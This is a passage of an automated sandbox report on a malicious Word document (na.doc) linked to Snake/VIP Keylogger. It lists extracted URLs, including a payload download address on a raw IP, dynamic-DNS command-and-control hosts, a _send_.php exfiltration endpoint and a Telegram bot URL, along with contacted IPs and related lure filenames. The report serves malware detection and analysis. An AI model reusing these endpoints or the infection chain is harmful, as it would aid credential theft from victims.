                                                  http://varders.kozow.com:8081cdlpohayugo39567.exe, 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002531000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    https://www.google.com/search?q=wmfcdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://checkip.dyndns.org/qcdlpohayugo39567.exe, 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://reallyfreegeoip.orgcdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002665000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000025EA000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000268F000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026BD000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026CB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002682000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://checkip.dyndns.comcdlpohayugo39567.exe, 00000007.00000002.911170867.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002665000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000268F000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026BD000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026CB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002682000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://ocsp.entrust.net0Dcdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecdlpohayugo39567.exe, 00000005.00000002.407830206.00000000025BB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002531000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://reallyfreegeoip.org/xml/cdlpohayugo39567.exe, 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://crl.entrust.net/server1.crl0cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&icdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035AB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://reallyfreegeoip.org/xml/173.254.250.784cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002615000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002665000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000268F000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026BD000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026CB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002682000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://checkip.dyndns.orgcdlpohayugo39567.exe, 00000007.00000002.911170867.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000269D000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002615000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002665000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000025C3000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000268F000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026BD000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026CB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002682000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchcdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035AB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://api.telegram.org/bot/sendMessage?chat_id=&text=cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://www.google.com/favicon.icocdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://aborters.duckdns.org:8081cdlpohayugo39567.exe, 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002531000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://ac.ecosia.org/autocomplete?q=cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035AB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl0cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://www.google.com/sorry/indexcdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      http://anotherarmy.dns.army:8081cdlpohayugo39567.exe, 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002531000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://reallyfreegeoip.orgcdlpohayugo39567.exe, 00000007.00000002.911170867.00000000025D2000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002615000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002665000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026D9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000268F000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026BD000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026CB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.0000000002682000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://87.120.84.38/txt/qHbynE8Vgwabsy3.exejEQNEDT32.EXE, 00000002.00000002.403105661.00000000005CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26acdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://www.google.com/search?q=netcdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://www.google.com/sorry/indextestcdlpohayugo39567.exe, 00000007.00000002.911778548.000000000365A000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.0000000003638000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000036EC000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.0000000003692000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.0000000003746000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.000000000370E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://api.telegram.orgcdlpohayugo39567.exe, 00000007.00000002.911170867.00000000026F4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  https://secure.comodo.com/CPS0cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035AB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  http://crl.entrust.net/2048ca.crl0cdlpohayugo39567.exe, 00000007.00000002.910557349.0000000000554000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027B7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035AB000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027CA000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911778548.00000000035F7000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.00000000027F8000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.911170867.000000000280B000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencodedcdlpohayugo39567.exe, 00000005.00000002.407925121.0000000003BA9000.00000004.00000800.00020000.00000000.sdmp, cdlpohayugo39567.exe, 00000007.00000002.910514133.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                                      		unknown

                                                                                      World Map of Contacted IPs

                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs

                                                                                      Public IPs

                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      132.226.8.169
                                                                                      		checkip.dyndns.comUnited States
                                                                                      		16989UTMEMUSfalse
                                                                                      149.154.167.220
                                                                                      		api.telegram.orgUnited Kingdom
                                                                                      		62041TELEGRAMRUtrue
                                                                                      188.114.97.3
                                                                                      		unknownEuropean Union
                                                                                      		13335CLOUDFLARENETUSfalse
                                                                                      87.120.84.38
                                                                                      		unknownBulgaria
                                                                                      		51189SHARCOM-ASBGtrue
                                                                                      193.122.6.168
                                                                                      		unknownUnited States
                                                                                      		31898ORACLE-BMC-31898USfalse
                                                                                      188.114.96.3
                                                                                      		reallyfreegeoip.orgEuropean Union
                                                                                      		13335CLOUDFLARENETUStrue
                                                                                      193.122.130.0
                                                                                      		unknownUnited States
                                                                                      		31898ORACLE-BMC-31898USfalse
                                                                                      158.101.44.242
                                                                                      		unknownUnited States
                                                                                      		31898ORACLE-BMC-31898USfalse
                                                                                      132.226.247.73
                                                                                      		unknownUnited States
                                                                                      		16989UTMEMUSfalse

                                                                                      General Information

                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                      Analysis ID:1545180
                                                                                      Start date and time:2024-10-30 08:18:26 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 9m 8s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                      Number of analysed new started processes analysed:13
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:na.doc
                                                                                      Detection:MAL
                                                                                      Classification:mal100.troj.spyw.expl.evad.winDOC@9/14@28/9
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 33.3%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 99%
                                                                                      • Number of executed functions: 93
                                                                                      • Number of non-executed functions: 133
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .doc
                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                      • Attach to Office via COM
                                                                                      • Active ActiveX Object
                                                                                      • Scroll down
                                                                                      • Close Viewer
                                                                                      • Override analysis time to 74287.3930392778 for current running targets taking high CPU consumption
                                                                                      • Override analysis time to 148574.786078556 for current running targets taking high CPU consumption

                                                                                      Warnings

                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                                      • Execution Graph export aborted for target EQNEDT32.EXE, PID 3256 because there are no executed function
                                                                                      • Execution Graph export aborted for target cdlpohayugo39567.exe, PID 3512 because it is empty
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      • VT rate limit hit for: na.doc

                                                                                      Simulations

                                                                                      Behavior and APIs

                                                                                      TimeTypeDescription
                                                                                      03:19:37API Interceptor284x Sleep call for process: EQNEDT32.EXE modified
                                                                                      03:19:41API Interceptor7004699x Sleep call for process: cdlpohayugo39567.exe modified
                                                                                      03:19:43API Interceptor19x Sleep call for process: powershell.exe modified

                                                                                      Joe Sandbox View / Context

                                                                                      IPs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      132.226.8.169na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      Quality stuff.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      z59IKE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      Proforma-Invoice#018879TT0100..docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      come.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      INVOICE.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      AWB#21138700102.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      na.docGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • checkip.dyndns.org/
                                                                                      149.154.167.220na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                          ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              Request For Quotation-RFQ097524_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                  Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                    Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                      Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        Ndnownts.exeGet hashmaliciousSnake KeyloggerBrowse

                                                                                                          Domains

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          reallyfreegeoip.orgna.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 188.114.96.3
                                                                                                          ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 188.114.97.3
                                                                                                          File07098.PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Payment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Request For Quotation-RFQ097524_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 188.114.97.3
                                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 188.114.97.3
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 188.114.97.3
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 188.114.96.3
                                                                                                          api.telegram.orgna.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Request For Quotation-RFQ097524_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Ndnownts.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          checkip.dyndns.comna.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 158.101.44.242
                                                                                                          ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          File07098.PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 193.122.130.0
                                                                                                          Payment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 193.122.6.168
                                                                                                          Quality stuff.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 132.226.8.169
                                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          Request For Quotation-RFQ097524_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 158.101.44.242
                                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 193.122.6.168
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 193.122.130.0
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 132.226.247.73

                                                                                                          ASNs

                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                          TELEGRAMRUna.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Request For Quotation-RFQ097524_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          Ndnownts.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 149.154.167.220
                                                                                                          CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                          • 188.114.96.3
                                                                                                          na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Payment&WarantyBonds.exeGet hashmaliciousFormBookBrowse
                                                                                                          • 172.67.154.67
                                                                                                          PO.2407010.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                          • 104.21.74.191
                                                                                                          ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 188.114.97.3
                                                                                                          File07098.PDF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Payment Slip_SJJ023639#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 188.114.96.3
                                                                                                          lf1SPbZI3V.exeGet hashmaliciousLokibotBrowse
                                                                                                          • 188.114.97.3
                                                                                                          PO-004976.xlsGet hashmaliciousUnknownBrowse
                                                                                                          • 188.114.96.3
                                                                                                          Po docs.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                          • 104.21.74.191
                                                                                                          UTMEMUSna.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          Quality stuff.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                          • 132.226.8.169
                                                                                                          Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 132.226.247.73
                                                                                                          Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                          • 132.226.8.169
                                                                                                          z59IKE.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                          • 132.226.8.169
